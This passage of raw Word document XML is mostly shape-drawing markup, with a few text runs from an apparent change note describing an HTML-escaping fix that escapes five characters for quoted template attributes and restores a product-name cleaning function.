                          <a:off x="0" y="0"/>
                          <a:ext cx="781050" cy="514350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="781050" cy="514350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="741" name="Shape 741"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="114300" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="114300" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="104775" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="107405" y="0"/>
                                  <a:pt x="109650" y="930"/>
                                  <a:pt x="111510" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="113370" y="4645"/>
                                  <a:pt x="114300" y="6893"/>
                                  <a:pt x="114300" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="114300" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="114300" y="135976"/>
                                  <a:pt x="113370" y="138224"/>
                                  <a:pt x="111510" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="109650" y="141939"/>
                                  <a:pt x="107405" y="142869"/>
                                  <a:pt x="104775"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44" name="Shape 744"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="180975" y="0"/>
                            <a:ext cx="114300" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="114300" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="104775" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="107405" y="0"/>
                                  <a:pt x="109650" y="930"/>
                                  <a:pt x="111510" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="113370" y="4645"/>
                                  <a:pt x="114300" y="6893"/>
                                  <a:pt x="114300" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="114300" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="114300" y="135976"/>
                                  <a:pt x="113370" y="138224"/>
                                  <a:pt x="111510" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="109650" y="141939"/>
                                  <a:pt x="107405" y="142869"/>
                                  <a:pt x="104775"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47" name="Shape 747"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="561975" y="0"/>
                            <a:ext cx="104775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="104775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="95250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="97880" y="0"/>
                                  <a:pt x="100125" y="930"/>
                                  <a:pt x="101985" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="103845" y="4645"/>
                                  <a:pt x="104775" y="6893"/>
                                  <a:pt x="104775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="104775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="104775" y="135976"/>
                                  <a:pt x="103845" y="138224"/>
                                  <a:pt x="101985" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="100125" y="141939"/>
                                  <a:pt x="97880" y="142869"/>
                                  <a:pt x="95250"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55" name="Shape 755"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="381000" y="371475"/>
                            <a:ext cx="400050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="400050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="390525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="393155" y="0"/>
                                  <a:pt x="395400" y="930"/>
                                  <a:pt x="397260" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399120" y="4645"/>
                                  <a:pt x="400050" y="6893"/>
                                  <a:pt x="400050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="400050" y="135976"/>
                                  <a:pt x="399120" y="138224"/>
                                  <a:pt x="397260" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="395400" y="141939"/>
                                  <a:pt x="393155" y="142869"/>
                                  <a:pt x="390525"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24" style="width:61.5pt;height:40.5pt;position:absolute;z-index:-2147483555;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:310.43pt;mso-position-vertical-relative:text;margin-top:11.9645pt;" coordsize="7810,5143">
                <v:shape id="Shape 741" style="position:absolute;width:1143;height:1428;left:0;top:0;" coordsize="114300,142875" path="m9525,0l104775,0c107405,0,109650,930,111510,2784c113370,4645,114300,6893,114300,9525l114300,133350c114300,135976,113370,138224,111510,140084c109650,141939,107405,142869,104775,142875l9525,142875c6895,142869,4650,141939,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 744" style="position:absolute;width:1143;height:1428;left:1809;top:0;" coordsize="114300,142875" path="m9525,0l104775,0c107405,0,109650,930,111510,2784c113370,4645,114300,6893,114300,9525l114300,133350c114300,135976,113370,138224,111510,140084c109650,141939,107405,142869,104775,142875l9525,142875c6895,142869,4650,141939,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 747" style="position:absolute;width:1047;height:1428;left:5619;top:0;" coordsize="104775,142875" path="m9525,0l95250,0c97880,0,100125,930,101985,2784c103845,4645,104775,6893,104775,9525l104775,133350c104775,135976,103845,138224,101985,140084c100125,141939,97880,142869,95250,142875l9525,142875c6895,142869,4650,141939,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 755" style="position:absolute;width:4000;height:1428;left:3810;top:3714;" coordsize="400050,142875" path="m9525,0l390525,0c393155,0,395400,930,397260,2784c399120,4645,400050,6893,400050,9525l400050,133350c400050,135976,399120,138224,397260,140084c395400,141939,393155,142869,390525,142875l9525,142875c6895,142869,4650,141939,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6893,930,4645,2790,2784c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib/escapeHtml.js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escaping all </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>five</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> significant characters rather than the usual </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">three — </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas"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matter because these templates interpolate into quoted attributes, where escaping only </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;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&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> still allows an attacker to close the quote and add an event handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B4E99" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="37"/>
        <w:ind w:right="16" w:hanging="25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Applied where API data </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>enters</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> each template rather than at each of the dozen </w:t>
      </w:r>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sites, so there is one line per value to review instead of twelve — which is how the originals ended up with none.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C534787" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="91" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="16" w:hanging="250"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cleanProductName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restored: it now strips the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>parenthesised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffix </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> escapes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC014D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="16" w:hanging="25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7152" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1217E30F" wp14:editId="396E8161">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>199132</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-221412</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5867399" cy="504825"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26925" name="Group 26925"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5867399" cy="504825"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5867399" cy="504825"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="760" name="Shape 760"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="981075" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="981075" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="971550" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="974180" y="0"/>
                                  <a:pt x="976425" y="930"/>
                                  <a:pt x="978285" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="980145" y="4645"/>
                                  <a:pt x="981075" y="6893"/>
                                  <a:pt x="981075" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="981075" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="981075" y="135976"/>
                                  <a:pt x="980145" y="138224"/>
                                  <a:pt x="978285" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="976425" y="141939"/>
                                  <a:pt x="974180" y="142869"/>
                                  <a:pt x="971550" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>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68" name="Shape 768"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1771650" y="200025"/>
                            <a:ext cx="1514475" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1514475" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1507580" y="0"/>
                                  <a:pt x="1509825" y="930"/>
                                  <a:pt x="1511685" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1513545" y="4645"/>
                                  <a:pt x="1514475" y="6893"/>
                                  <a:pt x="1514475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1514475" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1514475" y="126451"/>
                                  <a:pt x="1513545" y="128699"/>
                                  <a:pt x="1511685" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1509825" y="132420"/>
                                  <a:pt x="1507580" y="133350"/>
                                  <a:pt x="1504950" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>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71" name="Shape 771"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3705224" y="200025"/>
                            <a:ext cx="876300" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="876300" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="869405" y="0"/>
                                  <a:pt x="871650" y="930"/>
                                  <a:pt x="873510" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="875370" y="4645"/>
                                  <a:pt x="876300" y="6893"/>
                                  <a:pt x="876300" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="876300" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="876300" y="126451"/>
                                  <a:pt x="875370" y="128699"/>
                                  <a:pt x="873510" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="871650" y="132420"/>
                                  <a:pt x="869405" y="133350"/>
                                  <a:pt x="866775" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>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74" name="Shape 774"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4648200" y="200025"/>
                            <a:ext cx="571500" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="571500" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="561975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="564605" y="0"/>
                                  <a:pt x="566850" y="930"/>
                                  <a:pt x="568710" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="570570" y="4645"/>
                                  <a:pt x="571500" y="6893"/>
                                  <a:pt x="571500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="571500" y="126451"/>
                                  <a:pt x="570570" y="128699"/>
                                  <a:pt x="568710" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="566850" y="132420"/>
                                  <a:pt x="564605" y="133350"/>
                                  <a:pt x="561975" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>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77" name="Shape 777"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5286374" y="200025"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576376" y="930"/>
                                  <a:pt x="578236" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4645"/>
                                  <a:pt x="581025" y="6893"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126451"/>
                                  <a:pt x="580095" y="128699"/>
                                  <a:pt x="578236" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576376" y="132420"/>
                                  <a:pt x="574130" y="133350"/>
                                  <a:pt x="571500" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126451"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6893"/>
                                  <a:pt x="930" y="4645"/>
                                  <a:pt x="2790" y="2784"/>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80" name="Shape 780"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="371475"/>
                            <a:ext cx="1104900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1104900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1098005" y="0"/>
                                  <a:pt x="1100250" y="930"/>
                                  <a:pt x="1102110" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1103970" y="4645"/>
                                  <a:pt x="1104900" y="6893"/>
                                  <a:pt x="1104900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1104900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1104900" y="126451"/>
                                  <a:pt x="1103970" y="128699"/>
                                  <a:pt x="1102110" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1100250" y="132414"/>
                                  <a:pt x="1098005" y="133344"/>
                                  <a:pt x="1095375" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>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83" name="Shape 783"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1171575" y="371475"/>
                            <a:ext cx="1390650" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1390650" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1381125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1383755" y="0"/>
                                  <a:pt x="1386000" y="930"/>
                                  <a:pt x="1387860" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1389720" y="4645"/>
                                  <a:pt x="1390650" y="6893"/>
                                  <a:pt x="1390650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1390650" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1390650" y="126451"/>
                                  <a:pt x="1389720" y="128699"/>
                                  <a:pt x="1387860" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1386000" y="132414"/>
                                  <a:pt x="1383755" y="133344"/>
                                  <a:pt x="1381125" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>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86" name="Shape 786"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2628899" y="371475"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
